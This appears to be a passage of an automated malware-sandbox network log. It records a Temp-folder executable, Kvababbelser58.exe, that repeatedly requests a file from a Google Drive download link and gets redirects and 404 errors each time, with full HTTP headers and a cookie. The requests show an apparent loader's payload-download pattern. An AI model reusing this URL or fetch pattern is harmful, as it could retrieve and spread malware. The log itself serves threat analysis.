                                                                                                      Date: Fri, 10 Jan 2025 23:50:31 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-gxAafJmN17SefH3yfGHOMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:31 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Wtu1c1z9fPs64VAzZRUh8w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      28 | 192.168.2.7 | 49997 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:32 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:32 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Hq6E1yAmZsOKmw0JJ69GRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      29 | 192.168.2.7 | 49998 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:33 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:34 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTLIssDCzWFbOUwNqpzT03KRKDhfGwvgQcFexUw5z4Xoqqwiw90Ov1sunmqxyUMO031
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:34 GMT
                                                                                                      Content-Security-Policy: script-src 'nonce-onz_QF8a5M-uPghnW9aw_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:34 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qvopylEgFKbHhSvU20lMIw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      30 | 192.168.2.7 | 49999 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:34 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:35 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:35 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: script-src 'nonce-vAgWXGOqg7QUGjZJK6mLeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      31 | 192.168.2.7 | 50000 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:35 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:36 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC6yiVOmoJPcHaZ3zEhfW3E158_wGyfnx1NQ7tTaB25aPU9RXDYDTVjqbpayddFokWoB3pYcd6g
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:36 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-mhTIyIf-D2EniRLn6cC_lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:36 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="md-4WeEzzaiveJce9bUKSw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      32 | 192.168.2.7 | 50001 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:37 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:37 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-NxBVE6GcputAGuBlO5jKNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      33 | 192.168.2.7 | 50002 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:38 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:38 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgStGGVEuaZxYHgxMkQVeshSF5YeyuWhLvxPkUtEz0hjSPV9rc-1n3NFYHYdbRb6APUy
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:38 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-7LxbZh3Vx_-zy7Qxp_Jieg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:38 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RIb2IA7LrI3uSIQ-Ekml0A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      34 | 192.168.2.7 | 50003 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:39 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:40 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:39 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-MYU6aePA0Gnz4aBVrplfAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      35 | 192.168.2.7 | 50004 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:40 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:41 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgSE9w5OM9PRnkq2jF5FD20hLA9itqGpKhJCWFTgqREGHA-HMwkUyk8VYro5205aHhX-
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:40 GMT
                                                                                                      Content-Security-Policy: script-src 'nonce-Ug9YJVTGSzHQ48pgvEAAlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
